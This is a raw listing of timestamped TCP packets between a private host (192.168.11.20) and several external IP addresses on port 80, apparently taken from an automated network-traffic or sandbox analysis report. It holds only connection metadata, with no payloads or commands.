                                                                                                                  Feb 13, 2023 19:04:55.999943972 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:55.999989986 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:56.000035048 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:56.000078917 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:56.000165939 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:56.000211000 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:56.000298023 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:56.004806995 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:56.004910946 CET8049908217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:56.005177975 CET4990880192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:04:57.459558964 CET4990880192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:04:58.475120068 CET4991080192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:04:58.488459110 CET8049910217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:58.488699913 CET4991080192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:04:58.488909006 CET4991080192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:04:58.502048016 CET8049910217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:58.508574009 CET8049910217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:58.508657932 CET8049910217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:04:58.509140968 CET4991080192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:04:58.509141922 CET4991080192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:04:58.522473097 CET8049910217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:11.582643986 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:11.734621048 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:11.734941959 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:11.735027075 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:11.930320024 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.658806086 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.658885956 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.658948898 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.659003019 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.659058094 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.659106016 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:12.659166098 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:12.660254955 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.660392046 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.660463095 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.660475969 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:12.660518885 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.660576105 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.660676003 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:12.660736084 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:12.818463087 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.818536043 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.818592072 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.818656921 CET8049911103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:12.818727970 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:12.818873882 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:13.237333059 CET4991180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:14.253367901 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:14.420697927 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:14.421013117 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:14.421080112 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:14.632616043 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.334814072 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.334908962 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.334980011 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.335042953 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.335139036 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:15.335259914 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:15.336524010 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.336617947 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.336687088 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.336750984 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.336798906 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:15.336834908 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.336913109 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.336945057 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:15.337105989 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:15.495265007 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.495362043 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.495430946 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.495496035 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.495570898 CET8049912103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:15.495573997 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:15.495747089 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:15.924221992 CET4991280192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:16.939992905 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.107088089 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:17.107541084 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.108081102 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.108122110 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.279638052 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:17.279903889 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.280038118 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.280185938 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.448111057 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:17.448317051 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.449193001 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:17.449515104 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.449598074 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:17.449940920 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:17.617719889 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:17.618659973 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:17.619524002 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:17.620560884 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.407152891 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.407988071 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.408090115 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.408159018 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.408233881 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:18.408354998 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:18.409369946 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.409482956 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.409739971 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:18.410159111 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.410250902 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.410317898 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.410485983 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:18.411681890 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.411967039 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:18.577562094 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.577641964 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.577723980 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.577795029 CET8049913103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:18.577831984 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:18.577986002 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:18.611116886 CET4991380192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:19.626914978 CET4991680192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:19.753171921 CET8049916103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:19.753521919 CET4991680192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:19.753523111 CET4991680192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:19.889307976 CET8049916103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:19.889833927 CET4991680192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:19.889833927 CET4991680192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:05:20.018009901 CET8049916103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:24.891376019 CET4991780192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:24.900588989 CET8049917188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:24.900933027 CET4991780192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:24.900933027 CET4991780192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:24.910247087 CET8049917188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:25.216701984 CET8049917188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:25.216784000 CET8049917188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:25.216836929 CET8049917188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:25.216878891 CET8049917188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:25.216917038 CET8049917188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:25.216962099 CET8049917188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:25.217094898 CET4991780192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:25.217191935 CET4991780192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:26.406609058 CET4991780192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:27.421947002 CET4991880192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:27.431016922 CET8049918188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:27.431202888 CET4991880192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:27.431292057 CET4991880192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:27.440447092 CET8049918188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:27.651361942 CET8049918188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:27.651473999 CET8049918188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:27.651540041 CET8049918188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:27.651595116 CET8049918188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:27.651638985 CET8049918188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:27.651693106 CET8049918188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:27.651825905 CET4991880192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:27.651902914 CET4991880192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:28.936990023 CET4991880192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.953001022 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.962496042 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.962800026 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.963790894 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.963912964 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.973057985 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973140001 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973198891 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973253012 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973376989 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.973507881 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.973542929 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973624945 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973805904 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973876953 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973881960 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.973932981 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.973984003 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.974055052 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.974176884 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.974339962 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.982588053 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.982822895 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.982891083 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.982949018 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.983129025 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.983129978 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.983201981 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.983247995 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.983294964 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.983443975 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.983468056 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.983493090 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.983628988 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:29.983860970 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.983921051 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.984046936 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.984163046 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.992573977 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.992690086 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.992918015 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.992986917 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:29.993599892 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:30.034401894 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:30.185806036 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:30.185885906 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:30.185941935 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:30.185992956 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:30.186177969 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:30.186177969 CET4991980192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:30.186434031 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:30.195204020 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:30.195261002 CET8049919188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:32.483566046 CET4992080192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:32.492425919 CET8049920188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:32.492702007 CET4992080192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:32.492784023 CET4992080192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:32.501481056 CET8049920188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:32.694924116 CET8049920188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:32.695003033 CET8049920188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:32.695472002 CET4992080192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:32.695472956 CET4992080192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:05:32.704665899 CET8049920188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:37.701546907 CET4992180192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:37.865387917 CET8049921162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:37.865616083 CET4992180192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:37.865704060 CET4992180192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:38.032192945 CET8049921162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:38.044008017 CET8049921162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:38.044044971 CET8049921162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:38.044574022 CET4992180192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:39.372423887 CET4992180192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:40.387989044 CET4992280192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:40.549973011 CET8049922162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:40.550312996 CET4992280192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:40.550384045 CET4992280192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:40.712071896 CET8049922162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:40.721131086 CET8049922162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:40.721174002 CET8049922162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:40.721400976 CET4992280192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:42.059261084 CET4992280192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.074925900 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.235363960 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.235641003 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.236268997 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.236289024 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.236377954 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.396614075 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.396677971 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.396719933 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.396760941 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.396804094 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.396847963 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.396934032 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.397001028 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.397211075 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.557346106 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.557408094 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.557660103 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.557748079 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.557857990 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.557917118 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.557957888 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.557996035 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.558036089 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.558073044 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.558111906 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.558118105 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.558150053 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.558190107 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.558227062 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.558264017 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.558284998 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:43.718775988 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.718838930 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.718879938 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.719010115 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.719053030 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.722431898 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.722501040 CET8049923162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:43.722645044 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:44.746015072 CET4992380192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:45.762561083 CET4992480192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:45.924690008 CET8049924162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:45.924976110 CET4992480192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:45.925051928 CET4992480192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:46.087140083 CET8049924162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:46.096812010 CET8049924162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:46.096879959 CET8049924162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:46.097332001 CET4992480192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:46.097451925 CET4992480192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:05:46.259433031 CET8049924162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:51.104573011 CET4992680192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:51.200968981 CET8049926142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:51.201373100 CET4992680192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:51.201373100 CET4992680192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:51.297924042 CET8049926142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:51.697899103 CET8049926142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:51.698198080 CET8049926142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:51.698517084 CET4992680192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:52.713047981 CET4992680192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:53.729090929 CET4992780192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:53.825476885 CET8049927142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:53.825781107 CET4992780192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:53.825829029 CET4992780192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:53.922125101 CET8049927142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:54.302207947 CET8049927142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:54.302364111 CET8049927142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:54.302722931 CET4992780192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:55.337544918 CET4992780192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.353107929 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.452142954 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.452313900 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.453567982 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.453658104 CET4992880192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:05:56.552582026 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.552673101 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.552748919 CET8049928142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:05:56.552814007 CET8049928142.44.131.177192.168.11.20
